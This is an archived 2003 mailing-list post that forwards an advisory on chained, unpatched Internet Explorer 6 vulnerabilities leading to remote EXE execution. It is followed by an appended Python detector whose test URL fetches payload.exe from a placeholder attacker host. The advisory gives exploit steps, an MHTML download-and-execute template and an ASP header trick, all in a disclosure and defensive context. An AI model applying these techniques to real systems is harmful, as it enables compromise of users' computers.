[windows2000] Re: FYI: Multiple vulnerabilities in Internet Explorer

  • From: Bill Beckett <Bill.Beckett@xxxxxxxxxx>
  • To: "'windows2000@xxxxxxxxxxxxx'" <windows2000@xxxxxxxxxxxxx>
  • Date: Wed, 26 Nov 2003 10:37:53 -0500

Awesome, job security

> -----Original Message-----
> From: Daniel Ensor [SMTP:densor@xxxxxxxxx]
> Sent: Wednesday, November 26, 2003 8:35 AM
> To:   'windows2000@xxxxxxxxxxxxx'
> Subject:      [windows2000] FYI: Multiple vulnerabilities in Internet
> Explorer
> 
> Hi List
> 
> Just got this in:
> 
> Cheers
> 
> Dan
> --------------------------------------------------------------------
> Integralis S3 Advise .. Integralis S3 Advise .. Integralis S3 Advise
> --------------------------------------------------------------------
> 
> Affected platforms:     IE 6.0 with XP SP1 and MS03-048.
> Scope for attack:       Remote via hostile web page / e-mail.
> Effect:                 Various up to and including remote
>                         code execution leading to compromise of
>                         the users machine.
> Resolution:             Disable "Active Scripting" in the
>                         INTERNET zone.
> 
> A whole slew of vulnerabilities in Internet Explorer have been released by
> prominent IE researcher Liu Die Yu. These affect IE 6 with all the latest
> patches applied. In other words, there are no patches available for any of
> these problems. This presents a "vulnerability window" in which many
> desktops will remain vulnerable unless remedial action is taken
> immediately.
> 
> 
> Pete Philips
> pete@xxxxxxxxxxxxxxxxxxx
> 
> -----------------------------------------------------------------
> Integralis S3 Advise service
> 
> The following message is reposted complete from the original source. It has
> not been modified by Integralis S3 in any way.
> -----------------------------------------------------------------
> 
> New "Clean" IE Remote Compromise
> 
> [tested]
> OS:Win2k3,CN version
> IE: with MS03-048 installed.
> 
> OS:WinXp, CN version
> Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16
> 
> [overview]
> By combining several vulnerabilities in Internet Explorer, an attacker can
> execute his EXE file on the victim's system. ("Clean" means that no previously
> published vulnerability is involved in this exploit.)
> 
> [demo]
> There is a harmless demo:
> http://www.safecenter.net/UMBRELLAWEBV4/1stCleanRc/1stCleanRc-Demo/index.html
> (runs harmless demonstration executable)
> 
> [technical details]
> First, use MhtRedirParsesLocalFile to parse a local file in an IFRAME.
> (Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirParsesLocalFile)
> Then, use BackToFramedJpu to reach the MYCOMPUTER zone.
> (Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/BackToFramedJpu)
> At last, in the MYCOMPUTER security zone, use MhtRedirLaunchInetExe to download
> the payload EXE file and execute it. (Liu Die Yu's
> http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirLaunchInetExe)
> 
> [Workaround]
> Disable Active Scripting in INTERNET zone.
> 
> [Greetings]
> greetings to:
> Drew Copley, dror, guninski and mkill.
> 
> -----
> all mentioned resources can always be found at UMBRELLA.MX.TC
> 
> [people]
> LiuDieyuinchina [N0-@-Sp2m] yahoo.com.cn
> UMBRELLA.MX.TC ==> How to contact "Liu Die Yu"
> 
> [message]
> A wise man learns from other's mistakes; a fool learns from his own.
> 
> [Employment]
> I would like to work professionally as a security researcher/bug finder.
> 
> See my resume at my site. I am very eager to work, flexible, and extremely
> productive. I have a top notch resume, with credentials from leading bug
> finders. I am willing to work per contract, relocate, or telecommute.
> 
> [Give a Hand]
> I haven't got a job as a security researcher yet and my family don't
> support
> my security work - so, I don't have a computer of my own. Please consider
> about donating at: http://clik.to/donatepc
> 
> 
> -----------------------------------------------------------------
> Integralis S3 Advise service
> 
> The following message is reposted complete from the original source. It has
> not been modified by Integralis S3 in any way.
> -----------------------------------------------------------------
> 
> MHTML Redirection Leads to Downloading EXE and Executing
> 
> [tested]
> OS:Win2k3,CN version
> IE: with MS03-048 installed.
> 
> OS:WinXp, CN version
> Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16
> 
> [overview]
> A vulnerability in Internet Explorer is found: any attacker that can reach the
> MYCOMPUTER security zone (a.k.a. local zone) is able to download his EXE file
> and execute it.
> 
> [demo]
> There is a harmless demo:
> http://www.safecenter.net/UMBRELLAWEBV4/MhtRedirLaunchInetExe/MhtRedirLaunchInetExe-Demo.zip
> 
> [technical details]
> There is a feature in Internet Explorer when it tries to retrieve a file
> embedded in an MHT file, like:
> mhtml:[Mhtml_File_Url]![Original_Resource_Url]
> If [Original_Resource_Url] cannot be retrieved from [Mhtml_File_Url], IE
> will try to download [Original_Resource_Url] and return the downloaded
> content.
> 
> It is like an HTTP redirection.
> 
> And CODEBASE execution is a URL-based security check.
> (Liu Die Yu's http://continue.to/trie )
> 
> So, in the MYCOMPUTER security zone, point the CODEBASE property of an OBJECT tag
> with an unused CLSID to: mhtml:file:///C:\No_SUCH_MHT.MHT![Attacker_PayloadEXE_Url]
> and then IE will download [Attacker_PayloadEXE_Url] and execute it.
> 
> [Workaround]
> Disable Active Scripting in INTERNET zone.
> 
> 
> 
> -----------------------------------------------------------------
> Integralis S3 Advise service
> 
> The following message is reposted complete from the original source. It has
> not been modified by Integralis S3 in any way.
> -----------------------------------------------------------------
> 
> BackToFramedJpu - a successor of BackToJpu attack
> 
> [tested]
> OS:Win2k3,CN version
> IE: with MS03-048 installed.
> 
> OS:WinXp, CN version
> Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16
> 
> [overview]
> A cross-zone scripting vulnerability has been found in Internet Explorer. If
> a webpage contains some subframe (either FRAME tag or IFRAME tag), its
> security zone may be compromised.
> 
> [demo]
> There is a harmless demo:
> http://www.safecenter.net/UMBRELLAWEBV4/BackToFramedJpu/BackToFramedJpu-MyPage.htm
> 
> [technical details]
> After applying the MS03-048 patch, javascript-protocol URLs are no longer stored
> in the URL history list, which means the classical "javascript-protocol URL in
> history" attack doesn't work any more. (Liu Die Yu's
> http://www.safecenter.net/UMBRELLAWEBV4/BackMyParent2/index.html)
> 
> However, if an attacker does the following things:
> Navigate a sub-frame in the victim document to a javascript-protocol URL
> (first, navigate the sub-frame to the attacker's page, and then navigate the
> sub-frame to a javascript-protocol URL),
> and then navigate the top window away,
> At last, navigate back ("history.back()").
> 
> the javascript-protocol URL will be loaded by the top window (victim
> document) and the script in the javascript-protocol URL will be executed in the
> security zone of the victim document - a.k.a. cross-site/zone/domain scripting.
> 
> [Workaround]
> Disable Active Scripting in INTERNET zone.
> 
> 
> 
> -----------------------------------------------------------------
> Integralis S3 Advise service
> 
> The following message is reposted complete from the original source. It has
> not been modified by Integralis S3 in any way.
> -----------------------------------------------------------------
> 
> HijackClickV2 - a successor of HijackClick attack
> 
> [tested]
> OS:Win2k3,CN version
> IE: with MS03-048 installed.
> 
> OS:WinXp, CN version
> Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16
> 
> [overview]
> After applying MS03-048, the original HijackClick exploit doesn't work any
> more. With method caching(a.k.a "SaveRef"), HijackClick works again.
> 
> [demo]
> There is a harmless demo:
> http://www.safecenter.net/UMBRELLAWEBV4/HijackClickV2/HijackClickV2-MyPage.htm
> 
> [technical details]
> After applying MS03-048, the original HijackClick exploit doesn't work any
> more (Liu Die Yu's
> http://www.safecenter.net/UMBRELLAWEBV4/HijackClick/HijackClick-MyPage.HTM)
> because window.moveBy is inaccessible. A method caching attack can make
> window.moveBy accessible again.
> 
> [Workaround]
> Disable Active Scripting in INTERNET zone.
> 
> 
> 
> -----------------------------------------------------------------
> Integralis S3 Advise service
> 
> The following message is reposted complete from the original source. It has
> not been modified by Integralis S3 in any way.
> -----------------------------------------------------------------
> 
> Invalid ContentType may disclose cache directory
> 
> [tested]
> OS:WinXp, CN version
> Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16
> 
> [overview]
> The problem lies in the download function of Internet Explorer. This can be
> exploited by malicious web pages to get the cache directory, including random
> names.
> 
> [demo]
> There are two harmless demos:
> 1st, online demo, powered by ASP:
> http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/threadid10008-Demo
> 2nd, demo in ZIP format, powered by NETCAT:
> http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/threadid10008-Demo.zip
> 
> [technical details]
> When CONTENTTYPE in HTTP response is invalid and file extension is "HTM",
> the downloaded HTM file will be opened in cache directory, in INTERNET
> security zone.
> 
> In the 1st demo, this is done by the following ASP code:
> ----------
> response.ContentType = "whocares"
> response.AddHeader "content-disposition", "inline; filename=test.htm"
> ----------
> 
> In the 2nd demo, this is done with the help of NETCAT.
> 
> [Workaround]
> Disable Active Scripting in the INTERNET zone, so an HTML page opened in the
> cache can't send information back to the attacker.
> 
> Note for "Invalid ContentType may disclose cache directory"
> 
> This vulnerability ("Invalid ContentType may disclose cache directory")
> doesn't work on all systems. ("Invalid ContentType may disclose cache
> directory", at
> http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/)
> Please note that execdror6 and LocalZoneInCache also depend on this
> vulnerability.
> (execdror6: http://www.safecenter.net/UMBRELLAWEBV4/execdror6/
> LocalZoneInCache:
> http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/)
> I have spent an extraordinary amount of time on this issue and here is all I
> know about it:
> 
> First, the code was verified to work on a WinXp system (Simplified Chinese
> version) with all patches. Then, I sent LocalZoneInCache to HTTP-EQUIV, Dror
> Shalev and the Pull for testing: it works on Dror Shalev's WinXp
> machine (up-to-date) but it doesn't work on the Pull's Win2k system (because
> he set the killbit for the Adodb.Stream ActiveX object). Soon after that,
> HTTP-EQUIV found it does not work on his WinXp system (2-3 weeks old, with
> the latest IE patch). Then, to figure out what happened, I formatted the disk
> and installed Win2k3 and WinXp (both Simplified Chinese version) and then
> applied the latest IE patch. Both remote compromise cases (LocalZoneInCache
> and execdror6) don't work any more. At last, I reproduced both remote
> compromise cases on MSIEv6 running on Simplified Chinese WinXp with the
> following patches: SP1; Q828750; Q330994; Q824145 (a.k.a. MS03-048)
> 
> If you are using IE, please help me test it and send the result directly to
> my emailbox. Thanks in advance.
> 
> 
> 
> -----------------------------------------------------------------
> Integralis S3 Advise service
> 
> The following message is reposted complete from the original source. It has
> not been modified by Integralis S3 in any way.
> -----------------------------------------------------------------
> 
> Cache Disclosure Leads to MYCOMPUTER Zone and Remote Compromise
> 
> [tested]
> OS:WinXp, CN version
> Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16
> 
> [overview]
> By combining cache file disclosure and several other unpatched
> vulnerabilities, a malicious INTERNET page can reach the MYCOMPUTER zone. The
> demo uses Adodb.Stream to launch a remote compromise attack.
> 
> [demo]
> There are two harmless demos:
> Online demo, powered by ASP:
> http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/LocalZoneInCache-Demo/index.html
> (runs harmless demonstration executable)
> 
> [technical details]
> First, place an HTML file in the IE cache directory and get its location. (Liu
> Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/threadid10008/index.html)
> Second, this HTML file can be parsed as an HTML page and treated as in the
> MYCOMPUTER security zone. (Mindwarper of mlsecurity.com's
> http://www.mlsecurity.com/ie/ie.htm)
> (Liu Die Yu's
> http://www.safecenter.net/UMBRELLAWEBV4/DblSlashForCache/DblSlashForCache-Content.htm)
> At last, overwrite NOTEPAD.EXE and make IE launch it by opening a
> view-source protocol URL. (HTTP-EQUIV of MALWARE's
> http://www.securityfocus.com/archive/1/343521)
> 
> [Workaround]
> Disable Active Scripting in the INTERNET zone, so an HTML page opened in the
> cache can't send information back to the attacker.
> 
> 
> 
> -----------------------------------------------------------------
> Integralis S3 Advise service
> 
> The following message is reposted complete from the original source. It has
> not been modified by Integralis S3 in any way.
> -----------------------------------------------------------------
> 
> IE Remote Compromise by Getting Cache Location
> 
> [tested]
> OS:WinXp, CN version
> Microsoft Internet Explorer v6.Sp1; up-to-date on 2003/11/16
> 
> [overview]
> With the help of LocalZoneInCache (refer to the "[technical details]" part), an
> attacker can compromise a user's system even though the user has: 1.
> Customized the IE cache directory, 2. Applied the MS03-048 patch, 3. Set the
> killbit for the ADODB.STREAM ActiveX.
> 
> [demo]
> online demo, powered by ASP:
> http://www.safecenter.net/UMBRELLAWEBV4/execdror6/execdror6-Demo/index.html
> (runs harmless demonstration executable)
> 
> [technical details]
> execdror6 is derived from execdror5.
> (Liu Die Yu's http://www.safecenter.net/UMBRELLAWEBV4/execdror5/)
> execdror6 differs from execdror5 in that:
> 1st, execdror6 uses LocalZoneInCache to reach the MYCOMPUTER security zone.
> (Liu Die Yu's
> http://www.safecenter.net/UMBRELLAWEBV4/LocalZoneInCache/index.html)
> 2nd, execdror6 gets the IE cache directory directly from location.href.
> (LocalZoneInCache makes the attacker's HTML page open in the cache directory.)
> 
> [Workaround]
> Disable Active Scripting in the INTERNET zone, so an HTML page opened in the
> cache can't send information back to the attacker.
> 
> 
> 
> 
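Two of the forwarded advisories describe patterns a gateway or proxy can check for on the wire: a response whose Content-Type is not a parseable media type while Content-Disposition names an .htm file (the cache-disclosure case, mirrored by the ASP snippet above), and an mhtml: URL whose container is a local file: URL and whose inner resource is remote (the MhtRedirLaunchInetExe case). The following Python is an example added here, not code from the original post or from Liu Die Yu's demos; the response heads, the placeholder host and the function names are constructed for the example.

```python
import re
from typing import Optional
from urllib.parse import urlsplit

# Constructed sample HTTP response heads (not captured from the advisory's demo server).
SAMPLE_RESPONSES = {
    "benign_html": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n",
    "benign_download": ("HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n"
                        "Content-Disposition: attachment; filename=report.pdf\r\n\r\n"),
    # Mirrors the advisory's ASP snippet: a bogus media type plus an inline .htm filename.
    "cache_disclosure": ("HTTP/1.1 200 OK\r\nContent-Type: whocares\r\n"
                         "Content-Disposition: inline; filename=test.htm\r\n\r\n"),
}

# A syntactically valid media type is "type/subtype"; anything else is treated as invalid.
VALID_MEDIA_TYPE = re.compile(r"^[\w.+-]+/[\w.+-]+$")
HTML_EXTENSIONS = (".htm", ".html", ".mht", ".mhtml")


def parse_headers(raw: str) -> dict:
    """Parse a raw response head into a lowercase-keyed dict (first value wins)."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers.setdefault(name.strip().lower(), value.strip())
    return headers


def disposition_filename(value: str) -> Optional[str]:
    """Extract the filename parameter from a Content-Disposition value, if any."""
    match = re.search(r'filename\*?\s*=\s*"?([^";]+)"?', value, re.IGNORECASE)
    return match.group(1).strip() if match else None


def flag_response(raw: str) -> Optional[str]:
    """Return a reason when an HTML filename is served with an unparseable Content-Type."""
    headers = parse_headers(raw)
    media_type = headers.get("content-type", "").split(";")[0].strip()
    name = disposition_filename(headers.get("content-disposition", ""))
    if name and name.lower().endswith(HTML_EXTENSIONS) and not VALID_MEDIA_TYPE.match(media_type):
        return f"HTML filename {name!r} served with invalid Content-Type {media_type!r}"
    return None


# mhtml:<container-url>!<inner-url>; the advisory abuses a local, non-existent container.
MHTML_URL = re.compile(r"mhtml:(?P<container>[^!\s\"']+)!(?P<inner>[^\s\"'>]+)", re.IGNORECASE)


def flag_mhtml_url(url: str) -> Optional[str]:
    """Return a reason when an mhtml: URL redirects from a local container to a remote resource."""
    match = MHTML_URL.search(url)
    if not match:
        return None
    container, inner = match.group("container"), match.group("inner")
    if container.lower().startswith("file:") and urlsplit(inner).scheme in ("http", "https", "ftp"):
        return f"mhtml redirection from local container {container!r} to remote {inner!r}"
    return None


if __name__ == "__main__":
    for label, raw in SAMPLE_RESPONSES.items():
        print(label, "->", flag_response(raw))
    # Constructed URL shaped like the advisory's template; attacker.example is a placeholder host.
    print(flag_mhtml_url(r"mhtml:file:///C:\No_SUCH_MHT.MHT!http://attacker.example/payload.exe"))
```

Both checks are content-level signals for a filtering proxy or mail gateway; they complement, rather than replace, the advisory's workaround of disabling Active Scripting in the Internet zone.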